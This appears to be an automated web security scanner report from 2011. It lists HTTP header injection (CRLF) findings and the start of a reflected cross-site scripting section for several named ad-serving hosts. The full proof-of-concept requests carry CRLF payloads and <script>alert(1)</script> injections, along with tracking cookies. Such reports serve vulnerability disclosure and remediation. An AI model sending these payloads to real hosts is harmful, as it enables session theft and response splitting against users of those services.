GET /ad?c=RhmTmvF0v0C6AZspIIWveWN0Im0fysTH31JY4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!http://ad.doubleclick.net/jump/N3671.CentroNetwork/B5159652.2;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=2803508621?3690c%0d%0a1a9836ae15c HTTP/1.1 Host: ad.afy11.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: f=AgECAAAAAAALqJELwX83TQyokQsDfjdN; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*; c=AQEEAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAxZEByjtDTQAAAAAAAAAAAAAAAAAAAADUO0NNAQABAHVvC9XoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADfTrnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==; a=AZ7s9B85IkyRNDgbVDU-vg;
Response
HTTP/1.0 302 Moved Temporarily Connection: close Server: AdifyServer Location: http://ad.doubleclick.net/jump/N3671.CentroNetwork/B5159652.2;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=2803508621?3690c 1a9836ae15c P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"
The value of REST URL parameter 4 is copied into the location response header. The payload 1257a%0d%0a5c54a5c22bc was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /n/13465/13553/1257a%0d%0a5c54a5c22bc/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c HTTP/1.1 Host: au.track.decideinteractive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload b1baf%0d%0a7abf175386a was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerSource.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0b1baf%0d%0a7abf175386a; B3=89PS000000000GsZ7lgH0000000001sG89PT000000000RsZ852G0000000003sS7dNH0000000002sZ8cVQ0000000001sV83xP0000000001sF6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; A3=h5j3abLU07l00000Rh5iUabLQ07l00000Gf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; C4=; u3=1;
The value of the bwVal request parameter is copied into the Set-Cookie response header. The payload 3a3a9%0d%0a04e21258072 was submitted in the bwVal parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4189023~~0~~~^ebAdDuration~398~0~01020^Panel1_duration~10~0~01001^Panel1_autoshow~0~0~01001&OptOut=0&ebRandom=0.05569868558086455&flv=10.1103&wmpv=0&res=128&bwVal=3a3a9%0d%0a04e21258072&bwTime=1296236256165 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no Origin: http://www.cbs6albany.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 57ca0%0d%0a51ce047d9a0 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1891435&PluID=0&w=728&h=90&ord=2784774291777236223&ucm=true&ncu=http://r.turn.com/r/formclick/id/_6wFyXaBpSZSDgIAZwABAA/url/ HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=057ca0%0d%0a51ce047d9a0; A3=gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG852G0000000003sS83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g
The value of the flv request parameter is copied into the Set-Cookie response header. The payload 3d56a%0d%0a2e04529cfa5 was submitted in the flv parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4189023~~0~~~^ebAdDuration~398~0~01020^Panel1_duration~10~0~01001^Panel1_autoshow~0~0~01001&OptOut=0&ebRandom=0.05569868558086455&flv=3d56a%0d%0a2e04529cfa5&wmpv=0&res=128&bwVal=2030&bwTime=1296236256165 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no Origin: http://www.cbs6albany.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the res request parameter is copied into the Set-Cookie response header. The payload fee85%0d%0a8acf345c028 was submitted in the res parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4189023~~0~~~^ebAdDuration~398~0~01020^Panel1_duration~10~0~01001^Panel1_autoshow~0~0~01001&OptOut=0&ebRandom=0.05569868558086455&flv=10.1103&wmpv=0&res=fee85%0d%0a8acf345c028&bwVal=2030&bwTime=1296236256165 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no Origin: http://www.cbs6albany.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 4d23d%0d%0ab83ab2cdd72 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4189023~~0~~~^ebAdDuration~398~0~01020^Panel1_duration~10~0~01001^Panel1_autoshow~0~0~01001&OptOut=0&ebRandom=0.05569868558086455&flv=10.1103&wmpv=4d23d%0d%0ab83ab2cdd72&res=128&bwVal=2030&bwTime=1296236256165 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no Origin: http://www.cbs6albany.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the $ request parameter is copied into the Set-Cookie response header. The payload b50db%0d%0a33e663e7a7e was submitted in the $ parameter. This caused a response containing an injected HTTP header.
The value of the $ request parameter is copied into the Set-Cookie response header. The payload 9bc45%0d%0ad1fca8116ea was submitted in the $ parameter. This caused a response containing an injected HTTP header.
The value of the $ request parameter is copied into the Set-Cookie response header. The payload 2fe69%0d%0ac7e535fa282 was submitted in the $ parameter. This caused a response containing an injected HTTP header.
The value of the c request parameter is copied into the Location response header. The payload 61d82%0d%0ac94b6440ba8 was submitted in the c parameter. This caused a response containing an injected HTTP header.
Request
GET /w/click.here?cid=250428;mid=463354;m=1;sid=54393;c=0;tp=5;forced_click=http://clk.pointroll.com/bc/?a=1362053&c=61d82%0d%0ac94b6440ba8&i=EF9A0400-9CDB-6D58-1308-AD40023D0100&clickurl=http://ad.doubleclick.net/jump/N5664.134236.VALUECLICK/B4607923.9%3Bsz=1x1%3Bord=0.33574254042468965 HTTP/1.1 Host: media.fastclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; zru=1|:1294800534|; adv_ic=BxQAAAAcbUNNIAYGAAFJAACZUCAHIAtAAAIes0CAFwdDAACpSAAAYEAUIAABU2jgAS8BP17gAS8CvQ0/4AAvBBtZAAB2ICtAAAFcZ+ABLwDF4AIvAZph4AEXALDgAhcBpmDgARcBAlvgAV8B0FzgARcA/CCPwKcBCFfgARcAviBHAANAdCAAAXhL4AEXAHngAkcBXNWg1yDvAWQ44AFHAIvAvyAXAc1P4AFHAFXgAhcBR1PgAS8AJuACFwAPIHfAjwAD4AIXABjgAhcB/gyhHyBfAbda4AEvANzgAhcAxuACFwDY4AIXACjgAkcA0+ACFwHVXOABRwCr4AIXAXlHwBcBAAA=; vt=10070:256698:477674:54816:0:1295925050:3|10991:274413:511325:54393:0:1296263251:0|; pluto=517004695355|v1; pjw=BBQAAAACIAMDClZDTSAGAQABIAMCYEUEYBMC/fcHIA2AEwEeVOABHwBfoB8A/OACHwEpU+ABHwLmLwRgRwFfzeABPwE7UeABHwRORwQAAyBXAej74AEfAUVQ4AEfBDzSAwAEIB8B+hHgAR8BbkzgAR8BLjeAXwEq3uABHwF4S+ABHwBQIJ9AxwDX4AKfAX9K4AEfAYdBgB8B9fDgAT8BlEjgAR8BWEOAHwGa9eABHwGoRuABHwFSOYAfATz54AEfARxt4AEfAiTpA2E/AMegXwAGIMsBU2jgAR8A7aEfAF2hH0AfAVxn4AEfAFegvwDUoL9AHwGaYeABHwBfoJ8AmKCfQB8BpmDgAR8AbKCfAEugn0AfAc9c4AEfAS8sgL8BS8WAv0AfAdpb4AEfAJGhHwHu8uABHwEIV+ABHwEyRIG/AFLgAn8AOuEC3wHGLoBfAXHM4AE/4QOfASk/gB8BDu3AHwEAAA==;
The value of the cid request parameter is copied into the Location response header. The payload 9c6ba%0d%0ae8afb02647e was submitted in the cid parameter. This caused a response containing an injected HTTP header.
Request
GET /w/click.here?cid=250428;mid=463354;m=1;sid=54393;c=0;tp=5;forced_click=http://clk.pointroll.com/bc/?a=13620539c6ba%0d%0ae8afb02647e&c=1&i=EF9A0400-9CDB-6D58-1308-AD40023D0100&clickurl=http://ad.doubleclick.net/jump/N5664.134236.VALUECLICK/B4607923.9%3Bsz=1x1%3Bord=0.33574254042468965 HTTP/1.1 Host: media.fastclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; zru=1|:1294800534|; adv_ic=BxQAAAAcbUNNIAYGAAFJAACZUCAHIAtAAAIes0CAFwdDAACpSAAAYEAUIAABU2jgAS8BP17gAS8CvQ0/4AAvBBtZAAB2ICtAAAFcZ+ABLwDF4AIvAZph4AEXALDgAhcBpmDgARcBAlvgAV8B0FzgARcA/CCPwKcBCFfgARcAviBHAANAdCAAAXhL4AEXAHngAkcBXNWg1yDvAWQ44AFHAIvAvyAXAc1P4AFHAFXgAhcBR1PgAS8AJuACFwAPIHfAjwAD4AIXABjgAhcB/gyhHyBfAbda4AEvANzgAhcAxuACFwDY4AIXACjgAkcA0+ACFwHVXOABRwCr4AIXAXlHwBcBAAA=; vt=10070:256698:477674:54816:0:1295925050:3|10991:274413:511325:54393:0:1296263251:0|; pluto=517004695355|v1; pjw=BBQAAAACIAMDClZDTSAGAQABIAMCYEUEYBMC/fcHIA2AEwEeVOABHwBfoB8A/OACHwEpU+ABHwLmLwRgRwFfzeABPwE7UeABHwRORwQAAyBXAej74AEfAUVQ4AEfBDzSAwAEIB8B+hHgAR8BbkzgAR8BLjeAXwEq3uABHwF4S+ABHwBQIJ9AxwDX4AKfAX9K4AEfAYdBgB8B9fDgAT8BlEjgAR8BWEOAHwGa9eABHwGoRuABHwFSOYAfATz54AEfARxt4AEfAiTpA2E/AMegXwAGIMsBU2jgAR8A7aEfAF2hH0AfAVxn4AEfAFegvwDUoL9AHwGaYeABHwBfoJ8AmKCfQB8BpmDgAR8AbKCfAEugn0AfAc9c4AEfAS8sgL8BS8WAv0AfAdpb4AEfAJGhHwHu8uABHwEIV+ABHwEyRIG/AFLgAn8AOuEC3wHGLoBfAXHM4AE/4QOfASk/gB8BDu3AHwEAAA==;
The value of the i request parameter is copied into the Location response header. The payload 580bf%0d%0a0247a4016c9 was submitted in the i parameter. This caused a response containing an injected HTTP header.
Request
GET /w/click.here?cid=250428;mid=463354;m=1;sid=54393;c=0;tp=5;forced_click=http://clk.pointroll.com/bc/?a=1362053&c=1&i=580bf%0d%0a0247a4016c9&clickurl=http://ad.doubleclick.net/jump/N5664.134236.VALUECLICK/B4607923.9%3Bsz=1x1%3Bord=0.33574254042468965 HTTP/1.1 Host: media.fastclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; zru=1|:1294800534|; adv_ic=BxQAAAAcbUNNIAYGAAFJAACZUCAHIAtAAAIes0CAFwdDAACpSAAAYEAUIAABU2jgAS8BP17gAS8CvQ0/4AAvBBtZAAB2ICtAAAFcZ+ABLwDF4AIvAZph4AEXALDgAhcBpmDgARcBAlvgAV8B0FzgARcA/CCPwKcBCFfgARcAviBHAANAdCAAAXhL4AEXAHngAkcBXNWg1yDvAWQ44AFHAIvAvyAXAc1P4AFHAFXgAhcBR1PgAS8AJuACFwAPIHfAjwAD4AIXABjgAhcB/gyhHyBfAbda4AEvANzgAhcAxuACFwDY4AIXACjgAkcA0+ACFwHVXOABRwCr4AIXAXlHwBcBAAA=; vt=10070:256698:477674:54816:0:1295925050:3|10991:274413:511325:54393:0:1296263251:0|; pluto=517004695355|v1; pjw=BBQAAAACIAMDClZDTSAGAQABIAMCYEUEYBMC/fcHIA2AEwEeVOABHwBfoB8A/OACHwEpU+ABHwLmLwRgRwFfzeABPwE7UeABHwRORwQAAyBXAej74AEfAUVQ4AEfBDzSAwAEIB8B+hHgAR8BbkzgAR8BLjeAXwEq3uABHwF4S+ABHwBQIJ9AxwDX4AKfAX9K4AEfAYdBgB8B9fDgAT8BlEjgAR8BWEOAHwGa9eABHwGoRuABHwFSOYAfATz54AEfARxt4AEfAiTpA2E/AMegXwAGIMsBU2jgAR8A7aEfAF2hH0AfAVxn4AEfAFegvwDUoL9AHwGaYeABHwBfoJ8AmKCfQB8BpmDgAR8AbKCfAEugn0AfAc9c4AEfAS8sgL8BS8WAv0AfAdpb4AEfAJGhHwHu8uABHwEIV+ABHwEyRIG/AFLgAn8AOuEC3wHGLoBfAXHM4AE/4QOfASk/gB8BDu3AHwEAAA==;
The value of REST URL parameter 2 is copied into the location response header. The payload bae3a%0d%0a8cac8fd9833 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /n/bae3a%0d%0a8cac8fd9833/49889/www.247realmedia.com/1ykg1it;11;3;;6;;8rue07;;;;;1;/i/c?0&pq=%2fEN%2dUS%2f&1pixgif&referer= HTTP/1.1 Host: na.link.decdna.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Fri, 28 Jan 2011 14:16:11 GMT Server: Apache/1.3.33 (Unix) Pragma: no-cache Expires: Fri, 28 Jan 2011 14:16:11 GMT location: http://na.link.decdna.net/n/bae3a 8cac8fd9833/49889/www.247realmedia.com/1ykg1it;11;3;;6;;8rue07;;;;;1;/i/c?0&pq=%2fEN%2dUS%2f&1pixgif&referer=?0&0&pq=%2fEN%2dUS%2f&1pixgif&referer=&bounced Set-Cookie: %2edecdna%2enet/%2fn%2f0/2/e=1296224171/0/49889/0/0//0///0/0/0/0///0/0//0//0/0; expires=Sun, 27-Feb-2011 14:16:11 GMT; path=/n/0; domain=.decdna.net; P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT" Set-Cookie: id=9286424862321017538; expires=Sat, 28-Jan-2012 14:16:11 GMT; path=/; domain=.decdna.net; Set-Cookie: name=9286424862086137007; path=/; domain=.decdna.net; Content-Length: 0 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The value of REST URL parameter 4 is copied into the location response header. The payload d157e%0d%0a9e710a277af was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /n/49881/49889/d157e%0d%0a9e710a277af/1ykg1it;11;3;;6;;8rue07;;;;;1;/i/c?0&pq=%2fEN%2dUS%2f&1pixgif&referer= HTTP/1.1 Host: na.link.decdna.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Fri, 28 Jan 2011 14:16:12 GMT Server: Apache/1.3.33 (Unix) Pragma: no-cache Expires: Fri, 28 Jan 2011 14:16:12 GMT location: http://na.link.decdna.net/n/49881/49889/d157e 9e710a277af/1ykg1it;11;3;;6;;8rue07;;;;;1;/i/c?0&0&pq=%2fEN%2dUS%2f&1pixgif&referer=&bounced Set-Cookie: %2edecdna%2enet/%2fn%2f49881/2/e=1296224172/49881/49889/0/0//0///0/0/0/0///0/0//0//0/0; expires=Sun, 27-Feb-2011 14:16:12 GMT; path=/n/49881; domain=.decdna.net; P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT" Set-Cookie: id=9286424825394364597; expires=Sat, 28-Jan-2012 14:16:12 GMT; path=/; domain=.decdna.net; Set-Cookie: name=9286424825327255845; path=/; domain=.decdna.net; Content-Length: 0 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The value of REST URL parameter 5 is copied into the location response header. The payload 4f471%0d%0a5d3c9c04556 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /n/49881/49889/www.247realmedia.com/4f471%0d%0a5d3c9c04556;11;3;;6;;8rue07;;;;;1;/i/c?0&pq=%2fEN%2dUS%2f&1pixgif&referer= HTTP/1.1 Host: na.link.decdna.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the a request parameter is copied into the Location response header. The payload 166b6%0d%0a77cb3dde500 was submitted in the a parameter. This caused a response containing an injected HTTP header.
Request
GET /ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/166b6%0d%0a77cb3dde500 HTTP/1.1 Host: xads.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Fri, 28 Jan 2011 15:06:34 GMT Server: ZEDO 3G Set-Cookie: FFgeo=5386156; path=/; EXPIRES=Sat, 28-Jan-12 15:06:34 GMT; DOMAIN=.zedo.com Set-Cookie: ZFFbh=826-20110128,20|305_1;expires=Sat, 28 Jan 2012 15:06:34 GMT;DOMAIN=.zedo.com;path=/; Set-Cookie: PCA922865=a853584Zc1220000101%2C1220000101Zs69Zi0Zt128; path=/; EXPIRES=Sun, 27-Feb-11 15:06:34 GMT; DOMAIN=.zedo.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/166b6 77cb3dde500 Vary: Accept-Encoding Content-Length: 420 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://hpi.rotator.hadj7.adjuggler.net/servlet/ ...[SNIP]...
3.144. http://xads.zedo.com/ads2/c [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://xads.zedo.com
Path:
/ads2/c
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 958c6%0d%0a12c64e7ba41 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&958c6%0d%0a12c64e7ba41=1 HTTP/1.1 Host: xads.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Fri, 28 Jan 2011 15:06:36 GMT Server: ZEDO 3G Set-Cookie: FFgeo=5386156; path=/; EXPIRES=Sat, 28-Jan-12 15:06:36 GMT; DOMAIN=.zedo.com Set-Cookie: ZFFbh=826-20110128,20|305_1;expires=Sat, 28 Jan 2012 15:06:36 GMT;DOMAIN=.zedo.com;path=/; Set-Cookie: PCA922865=a853584Zc1220000101%2C1220000101Zs69Zi0Zt128; path=/; EXPIRES=Sun, 27-Feb-11 15:06:36 GMT; DOMAIN=.zedo.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&958c6 12c64e7ba41=1 Vary: Accept-Encoding Content-Length: 427 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://hpi.rotator.hadj7.adjuggler.net/servlet/ ...[SNIP]...
4. Cross-site scripting (reflected)previousnext There are 1047 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d1f99<script>alert(1)</script>c1a752a6f1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /add1f99<script>alert(1)</script>c1a752a6f1e/cm.quadbostonherald/ HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Content-Type: text/html Content-Length: 78 Date: Sat, 29 Jan 2011 05:19:59 GMT Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e4883<script>alert(1)</script>33df23666f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
